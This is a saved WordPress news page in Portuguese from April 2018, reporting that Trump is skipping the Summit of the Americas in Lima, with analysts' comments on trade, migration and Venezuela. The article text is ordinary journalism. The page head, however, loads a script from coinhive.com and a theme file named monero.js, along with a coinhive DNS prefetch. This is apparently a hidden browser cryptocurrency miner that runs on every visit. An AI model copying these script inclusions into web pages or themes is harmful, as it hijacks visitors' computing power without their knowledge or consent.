

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />
<title>TRUMP ESNOBA CÚPULA DAS AMÉRICAS</title>

	<!-- Meta Tag Manager -->
	<meta http-equiv="pragma" content="no-cache" />
	<!-- / Meta Tag Manager -->
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//s.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para  &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo; TRUMP ESNOBA CÚPULA DAS AMÉRICAS" href="http://oiguassu.com/trump-esnoba-cupula-das-americas/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.5"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.0' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.5'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.5'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.5'></script>
<link rel='https://api.w.org/' href='http://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='MINISTERIO PÚBLICO ESTADUAL ABRE PROCESSO SELETIVO PARA ACADÊMICOS DE DIREITO EM FOZ' href='http://oiguassu.com/ministerio-publico-esstadual-abre-processo-seletivo-para-academicos-de-direito-em-foz/' />
<link rel='next' title='LATINOAMÉRICA CELEBRA UNA CUMBRE SOBRE LA CORRUPCIÓN CON LAS ÉLITES DEVORADAS POR LOS ESCÁNDALOS' href='http://oiguassu.com/latinoamerica-celebra-una-cumbre-sobre-la-corrupcion-con-las-elites-devoradas-por-los-escandalos/' />
<meta name="generator" content="WordPress 4.9.5" />
<link rel="canonical" href="http://oiguassu.com/trump-esnoba-cupula-das-americas/" />
<link rel='shortlink' href='https://wp.me/pS5BS-1A7' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Ftrump-esnoba-cupula-das-americas%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Ftrump-esnoba-cupula-das-americas%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<meta name="description" content="Presidente será primeiro líder dos EUA a faltar ao evento, o que deixa claro que região não é prioridade para ele. Mas latino-americanos parecem pouco se importar com a ausência. O presidente Donald Trump se orgulha de fazer as coisas a sua maneira, e agora ele pode acrescentar mais uma proeza ao seu currículo: esnobar formalmente&hellip;" />

<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="TRUMP ESNOBA CÚPULA DAS AMÉRICAS" />
<meta property="og:url" content="http://oiguassu.com/trump-esnoba-cupula-das-americas/" />
<meta property="og:description" content="Presidente será primeiro líder dos EUA a faltar ao evento, o que deixa claro que região não é prioridade para ele. Mas latino-americanos parecem pouco se importar com a ausência. O presidente Donal…" />
<meta property="article:published_time" content="2018-04-13T09:18:03+00:00" />
<meta property="article:modified_time" content="2018-04-13T09:18:03+00:00" />
<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1.jpeg" />
<meta property="og:image:width" content="970" />
<meta property="og:image:height" content="600" />
<meta property="og:locale" content="pt_BR" />
<meta name="twitter:site" content="@OIguassuDigital" />
<meta name="twitter:text:title" content="TRUMP ESNOBA CÚPULA DAS AMÉRICAS" />
<meta name="twitter:image" content="http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1.jpeg?w=640" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:creator" content="@OIguassuDigital" />
</head>
<body class="post-template-default single single-post postid-6083 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2017/08/cropped-Sem-Título-1-1.jpg" height="150" width="500" alt="" />
<div class="logo">
</div>
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/crise-siria-aumenta-risco-de-conflito-entre-eua-e-russia/" title="CRISE SÍRIA AUMENTA RISCO DE CONFLITO ENTRE EUA E RÚSSIA">
					<span class="ticker-item-date">Abril 13, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CRISE SÍRIA AUMENTA RISCO DE CONFLITO ENTRE EUA E RÚSSIA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/el-plan-para-que-puerto-iguazu-misiones-sea-la-puerta-de-entrada-de-turistas-al-pais/" title="EL PLAN PARA QUE PUERTO IGUAZÚ (MISIONES) SEA LA PUERTA DE ENTRADA DE TURISTAS AL PAÍS">
					<span class="ticker-item-date">Abril 13, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">EL PLAN PARA QUE PUERTO IGUAZÚ (MISIONES) SEA LA PUERTA DE ENTRADA DE TURISTAS AL PAÍS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/ciudad-del-este-complices-en-trafico-internacional-de-drogas-recibieron-condena-incluso-un-ciudadano-brasileno/" title="Ciudad del Este &#8211; CÓMPLICES EN TRÁFICO INTERNACIONAL DE DROGAS RECIBIERON CONDENA, INCLUSO UN CIUDADANO BRASILEÑO">
					<span class="ticker-item-date">Abril 13, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Ciudad del Este &#8211; CÓMPLICES EN TRÁFICO INTERNACIONAL DE DROGAS RECIBIERON CONDENA, INCLUSO UN CIUDADANO BRASILEÑO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/la-habana-ano-cero-el-19-de-abril-marcara-un-hecho-historico-el-fin-de-la-era-castro-en-cuba/" title="LA HABANA, AÑO CERO El 19 de abril marcará un hecho histórico: el fin de la era Castro en Cuba">
					<span class="ticker-item-date">Abril 13, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">LA HABANA, AÑO CERO El 19 de abril marcará un hecho histórico: el fin de la era Castro en Cuba</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/brasil-tem-5-134-refugiados-vivendo-em-territorio-nacional/" title="BRASIL TEM 5.134 REFUGIADOS VIVENDO NO TERRITÓRIO NACIONAL">
					<span class="ticker-item-date">Abril 13, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">BRASIL TEM 5.134 REFUGIADOS VIVENDO NO TERRITÓRIO NACIONAL</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/latinoamerica/" itemprop="url"><span itemprop="title">Latinoamerica</span></a></span></nav>
<article id="post-6083" class="post-6083 post type-post status-publish format-standard has-post-thumbnail hentry category-latinoamerica">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			TRUMP ESNOBA CÚPULA DAS AMÉRICAS		</h1>
			</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1-777x437.jpeg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1-777x437.jpeg 777w, http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1-180x101.jpeg 180w, http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1-260x146.jpeg 260w, http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1-373x210.jpeg 373w, http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1-120x67.jpeg 120w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="6088" data-permalink="http://oiguassu.com/trump-esnoba-cupula-das-americas/520827-970x600-1-2/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1.jpeg" data-orig-size="970,600" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="520827-970&#215;600-1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1-300x186.jpeg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/04/520827-970x600-1-1.jpeg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/administrador/">Administrador</a></span>
<span class="entry-meta-date updated">Abril 13, 2018</span>
</p>
	<div class="entry-content clearfix">
		<!--CusAdsVi1--><h3 class="western" style="text-align: justify;" align="justify"><span style="font-size: medium;"><b>Presidente será primeiro líder dos EUA a faltar ao evento, o que deixa claro que região não é prioridade para ele. Mas latino-americanos parecem pouco se importar com a ausência.</b></span></h3>
<p style="text-align: justify;">O presidente Donald Trump se orgulha de fazer as coisas a sua maneira, e agora ele pode acrescentar mais uma proeza ao seu currículo: esnobar formalmente os vizinhos continentais dos Estados Unidos. Sua decisão de última hora de não ir à Cúpula das Américas, em Lima, marca a primeira vez que um presidente dos EUA deixa de ir ao encontro de lideranças das Américas do Sul, Central e do Norte.</p>
<p style="text-align: justify;">A planejada visita de Trump seria sua primeira à América Latina e ofereceria a chance de encontros pessoais com seus líderes, para ajudar a aliviar as tensões em torno de problemas como comércio e imigração. Ao enviar o vice-presidente Mike Pence em seu lugar, Trump indica que a região não é uma prioridade para os Estados Unidos. &#8220;O cancelamento tardio de Trump envia a mensagem de que ele considera a América Latina o quintal que precisa de pouca manutenção&#8221;, compara Laura Carlsen, diretora do Programa das Américas do <em>think tank</em> Center for International Policy (CIP).</p>
<p style="text-align: justify;">A razão oficial para o cancelamento foi a necessidade de coordenar a resposta dos EUA à situação na Síria. Outros apontaram a fúria do presidente com a batida feita pelo FBI no escritório de seu advogado pessoal em Nova York e a investigação do procurador especial Robert Mueller sobre o envolvimento do Kremlin em sua campanha. Seja qual for a desculpa, Carlsen não ficou surpreso com a decisão. &#8220;Ele não tinha nada para ganhar&#8221;, avalia.</p>
<h3 style="text-align: justify;"><strong>Figura impopular</strong></h3>
<p style="text-align: justify;">Os líderes latino-americanos não demonstraram especial decepção com a mudança de planos de Trump. Ele é uma figura extremamente impopular na região, e, sem dúvida, muitos não estavam ansiosos para conhecê-lo – certamente não gostariam de ser vistos por seus eleitores como simpáticos à agenda do americano.</p>
<p style="text-align: justify;">A empresa de pesquisa Gallup descobriu que o índice de aprovação de Trump na América Latina era de 16% em 2017. Em contraste, o presidente Barack Obama obtinha mais de 50% de popularidade em quase todos os países da América Latina durante seu primeiro ano no governo.</p>
<p style="text-align: justify;">O relacionamento tenso de Trump com a América Latina resulta de uma longa lista de atritos. Ele acusou o México de enviar traficantes, estupradores e criminosos para os Estados Unidos. Sua administração cancelou a proteção para imigrantes da Nicarágua, El Salvador e Honduras que vivem nos EUA há anos. Sem conseguir fundos suficientes do Congresso para cumprir sua promessa de campanha de construir um muro na fronteira mexicana – ou fazer com que o México pague por ela – ele anunciou, apenas poucos dias antes da cúpula, que enviaria milhares de integrantes da Guarda Nacional para militarizar a área.</p>
<h3 style="text-align: justify;"><strong>Venezuela será tema</strong></h3>
<p style="text-align: justify;">Funcionários do governo dos EUA têm afirmado que um dos principais objetivos dos Estados Unidos na cúpula é promover o país como um parceiro comercial de primeira linha, dando uma resposta às incursões da China na região. &#8220;Eles estão muito claramente focados num cenário de &#8216;ou eles ou nós&#8217; em termos da presença do governo dos EUA e do governo chinês na região&#8221;, avalia Carlsen. É uma meta excessivamente otimista, que exigiria o fim de laços comerciais fortes. &#8220;As chances de que qualquer país ou empresa privada diga que vai romper os laços com os chineses e se unir aos EUA são mínimas.&#8221;</p>
<p style="text-align: justify;">As negociações trilaterais do Nafta poderiam ter sido um ponto alto da cúpula. Após usar o acordo como instrumento de barganha para que o México fortifique sua fronteira, Trump poderia ter realizado uma reunião trilateral em Lima, com o México e o Canadá, para mostrar apoio a uma renegociação bem-sucedida do acordo.</p>
<p style="text-align: justify;">Autoridades dos EUA também pretendem usar a cúpula para aumentar a pressão sobre a Venezuela e seu presidente, Nicolás Maduro, enquanto o país enfrenta uma grande crise humanitária, que inclui escassez de alimentos e suprimentos médicos. Maduro também cancelou sua participação.</p>
<p style="text-align: justify;">No mês passado, os EUA anunciaram o fornecimento de 2,5 milhões de dólares de ajuda humanitária à Colômbia para ajudar mais de meio milhão de venezuelanos que fugiram para o país. No entanto, a cúpula poderia servir de cenário para pressionar por mais ação. &#8220;Considerando a escala [da crise], alguns milhões de dólares são apenas uma gota no balde para o que é realmente necessário&#8221;, diz Jason Marczak, diretor do Adrienne Arsht Latin America Center, do <em>think tank</em>Atlantic Council. &#8220;Se espera que na cúpula haja um foco real não apenas na assistência financeira, mas também em ajudar os países a lidar com o afluência de pessoas que os alcançam.&#8221;</p>
<h3 style="text-align: justify;"><strong>Sem papel de liderança</strong></h3>
<p style="text-align: justify;">Se o atual diretor da CIA, Mike Pompeo, for confirmado como o novo secretário de Estado dos EUA, é provável que o Departamento de Estado assuma um protagonismo maior do que sob seu antecessor, Rex Tillerson. &#8220;Como o presidente confia [em Pompeo], espero que o Departamento de Estado exerça um papel de maior liderança nas questões latino-americanas do que até agora&#8221;, diz Marczak.</p>
<p style="text-align: justify;">Pompeo vai se unir a Pence na representação dos EUA na Cúpula das Américas, que começa nesta sexta-feira (13/04). No entanto, tanto Trump quanto os líderes latino-americanos parecem pouco se importar com a oportunidade perdida de um encontro pessoal. &#8220;Os Estados Unidos não estão em posição de oferecer liderança para um continente em crise, e as nações da região estão pouco dispostas a procurar respostas de Washington&#8221;, afirma Carlsen.</p>
<p style="text-align: justify;">
<h6 style="text-align: right;">(Com DW)</h6>

<div style="font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;"></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-6083" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/trump-esnoba-cupula-das-americas/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-6083" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/trump-esnoba-cupula-das-americas/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-6083" class="share-google-plus-1 sd-button share-icon no-text" href="http://oiguassu.com/trump-esnoba-cupula-das-americas/?share=google-plus-1" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "TRUMP ESNOBA CÚPULA DAS AMÉRICAS"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/trump-esnoba-cupula-das-americas/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='6083' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="4b00688c04" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="223"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2018 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>
	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/trump-esnoba-cupula-das-americas\/":6083};
	</script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201815'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2018Apraa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.5'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.5'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.5'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.0'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201815.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.0',blog:'12891280',post:'6083',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '6083' ]);
</script>
</body>
</html>